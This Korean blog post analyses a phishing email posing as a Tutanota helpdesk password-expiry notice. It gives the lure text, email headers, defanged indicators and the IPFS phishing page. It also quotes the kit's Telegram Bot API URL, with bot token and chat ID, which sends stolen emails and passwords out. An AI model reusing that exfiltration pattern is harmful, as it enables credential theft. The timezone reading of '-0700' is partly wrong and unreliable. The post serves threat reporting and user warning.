오늘은 Tutanota 이메일 고객센터 피싱 메일인 ipfs(.)io에 대해 글을 적어 보겠습니다.
해당 ipfs(.)io는 이미 전 세계적으로 피싱 메일을 대량으로 뿌리는 피싱 조직입니다. 마이크로소프트 계정 등으로 바이러스 토탈 에 보면 고객 맞춤형으로 뿌리는 방식을 취하는 것 같습니다.
제목은 tutanota(.)com Helpdesk 이며 이메일 주소에 맞게 구성을 하는 것 같습니다. 즉 고객센터에서 보낸 것처럼 위장하고 있지만, 사실은 아니고 내용은 다음과 같습니다.
Good day ????? ,
Gentle reminder! regarding your email password for ????????@tutanota(.)com will expire in 48 hours .
Action required: Continue With Same Password.
Thank you.
Customer Services Team
The email is automatically generated upon request. This electronic transmission is confidential information and is for your use only. If this is not the case, please delete the original and all copies and notify the sender immediately.
Copyright ©2023 . All rights reserved sportplus(.)cl
이 걸을 한국어로 번역하면 다음과 같이 됩니다.
좋은 하루 ??????,
부드러운 알림! ?@tutanota(.)com의 이메일 비밀번호는 48시간 후에 만료됩니다.
조치 필요: 같은 암호로 계속하십시오.
감사합니다.
고객서비스팀
이메일은 요청 시 자동으로 생성됩니다. 이 전자 전송은 기밀 정보이며 귀하만 사용할 수 있습니다. 그렇지 않았으면 원본 및 모든 사본을 삭제하고 즉시 보낸 사람에게 알리십시오.
저작권 ©2023. 판권 소유 sportplus(.)cl
한마디로 이야기하면 이메일 비밀번호가 48시간 안에 종료가 될 것이니 네가~링크를 통해서 들어와서 한번 로그인하세요. 하는 전형적인 피싱 수법입니다.
유포 주소는 다음과 같습니다.
https://ipfs(.)io/ipfs/QmUpEDzSTLUyENC3zfpjofzPu2xChHymyBT64oGbb5Ub7Y?filename=
ssssshshwebmailindex(.)html
#???????@tutanota(.)com
그리고 이메일 헤더의 내용은 다음과 같습니다.
Authentication-Results: w10.tutanota(.)de (dis=spam; info=dmarc default policy);
dmarc=fail (dis=spam p=quarantine; aspf=r; adkim=r; pSrc=config)
header.from=golffrederickmd(.)com
Received: from w1.tutanota(.)de ([192.168.1(.)162])
by tutadb.w10.tutanota(.)de
with SMTP (SubEthaSMTP 3.1.7) id LL6IMPF0
for ?????@tutanota(.)com;
Fri, 11 Aug 2023 13:39:25 +0200 (CEST),
from power.mallibuboats(.)com (unknown [81.161.229(.)96])
by w1.tutanota(.)de (Postfix) with ESMTP id D0FC5FBFAFE for <????@tutanota(.)com>;
Fri, 11 Aug 2023 11:38:44 +0000 (UTC),
from [79.110.48(.)246] (localhost [IPv6:::1])
by power.mallibuboats(.)com (Postfix)
with ESMTP id 43979233C09
for <?????@tutanota.com>; Fri, 11 Aug 2023 02:55:56 -0400 (EDT)
Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=81.161.229(.)96;
helo=power.mallibuboats(.)com;
envelope-from=chris@golffrederickmd(.)com; receiver=<UNKNOWN>
From: "tutanota(.)com Helpdesk" <chris@golffrederickmd(.)com>
To: ?????@tutanota(.)com
Subject: Final warning - Action Required
Date: 10 Aug 2023 23:55:56 -0700
Message-ID:<20230810235556.84257D73A6F99327@golffrederickmd(.)com>
MIME-Version: 1.0
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Type: multipart/related; boundary="------------79Bu5A16qPEYcVIZL@tutanota"
이고 이걸 해석을 하면 다음과 같습니다.
이메일 헤더 분석 내용:
Authentication-Results: 발신 도메인인 golffrederickmd(.)com의 DMARC 정책이 실패(fail)했으며 SPF 정책도 softfail로 실패
Received:이메일은 tutadb.w10.tutanota(.)de 서버에서 시작되어 power.mallibuboats(.)com 서버를 거쳐 도착
Received-SPF:발신 도메인인 golffrederickmd(.)com의 SPF 검사 결과가 softfail로 나타나거나 발신 도메인과 클라이언트 IP 주소가 명시
From: 발신자 이름은 tutanota(.)com Helpdesk 이며 이메일 주소는 chris@golffrederickmd(.)com으로 표시
To: 수신자의 이메일 주소는 ???????@tutanota(.)com
Subject: 이메일 제목은 Final warning - Action Required
Date: 이메일이 보내진 날짜와 시간은 10 Aug 2023 23:55:56 -0700으로 표시
Message-ID: 이메일의 고유한 식별자인 메시지 ID가 포함
MIME-Version: 이메일의 MIME 버전은 1.0으로 나타남
Content-Transfer-Encoding: 이메일의 내용 전송 방식은 quoted-printable로 설정되어 있음
Content-Type: 이메일의 내용 유형은 multipart/related로, 여러 파트로 구성되어 있음
이메일 발신된 시간대를 기준으로 해당 시간대에 속하는 국가들:
이메일이 보내진 시간대 10 Aug 2023 23:55:56 -0700 은 태평양 표준시(UTC-7)
해당 시간대에 속하는 국가들로는 다음과 같은 지역들이 있음
1. 미국 태평양 시간(PT, Pacific Time):미국의 서부 지역, 예를 들어 캘리포니아 주와 워싱턴 주 등이 이 시간대
2. 캐나다 태평양 시간(PT): 캐나다의 서부 지역 예를 들어 영국 컬럼비아 주와 앨버타 주 등이 이 시간대에 속함
3. 멕시코 시티 시간(CST, Central Standard Time): 멕시코의 시티 지역이 이 시간대에 속함
이메일은 미국 태평양 지역, 캐나다 태평양 지역 또는 멕시코 시티 시간대에서 보내졌을 가능성이 있으며, Final warning - Action Required 라는 제목으로 발신
인증서 정보를 보면 다음과 같습니다.
일반 이름:dweb(.)link
인증서:Let's Encrypt
인 것을 확인할 수가 있습니다.
그리고 다음 주소에 이메일 주소가 셋팅이 돼 있는 것을 확인할 수가 있습니다.
https://fordable(.)sbs/mx/?access=???????@tutanota(.)com
이며 해당 부분을 Raw 값으로 보면 다음과 같습니다.
GET /mx/?access=???@tutanota(.)com HTTP/1.1
Host: fordable(.)sbs
Connection: keep-alive
sec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://ipfs(.)io
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ipfs(.)io/
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
Accept-Encoding: gzip, deflate
개인 정보는 텔레그램을 통해서 전송됩니다.
https://api.telegram(.)org/bot6172066257:AAEFfYuPPHkafskvKcKhptg4-Dg_YQG36tY/
sendMessage?chat_id=5726465324&ajaxid=4&text=Email%3???????%40tutanota(.)com
+%7C+Password%3Ajajajajaj
해당 사이트는 Phishing, 스팸(SPAM) 입니다.
이메일 주소 와 기본적인 보안 수칙 및 보안 프로그램을 잘 사용하면 예방을 하는데 도움을 줄 수가 있습니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
김수키(Kimsuky) 한국 인터넷 진흥원(KISA) 사칭 악성코드-현황조사표.xlsx.lnk(2023.8.11) (0) | 2023.08.22 |
---|---|
김수키(Kimsuky) 만든 SGI 서울보증 사칭 악성코드-sgic_info.chm(2023.8.14) (0) | 2023.08.21 |
국민건강보험 공단 피싱 사이트 스미싱 사이트-x08(.)g7rs(.)hair(2023.08.13) (2) | 2023.08.18 |
몸캠으로 의심이 되는 안드로이드 스마트폰 악성코드-Stripchat.apk(2023.8.11) (0) | 2023.08.17 |
주문서로 위장한 피싱 메일-ipfs(.)dweb(.)link(2023.8.7) (0) | 2023.08.15 |
구글 플레이 스토어에서 유포 된 애드웨어-트로트 노래모음-최신 트롯트 인기가요 음악듣기 앱( 2021,08,19) (2) | 2023.08.14 |
국민건강보험 공단 피싱 사이트-sa1(.)f6pt(.)hair(2023.08.12) (2) | 2023.08.13 |
윈도우 10,윈도우 11 KB5029244,KB5029247,KB5029263 보안 업데이트 (0) | 2023.08.10 |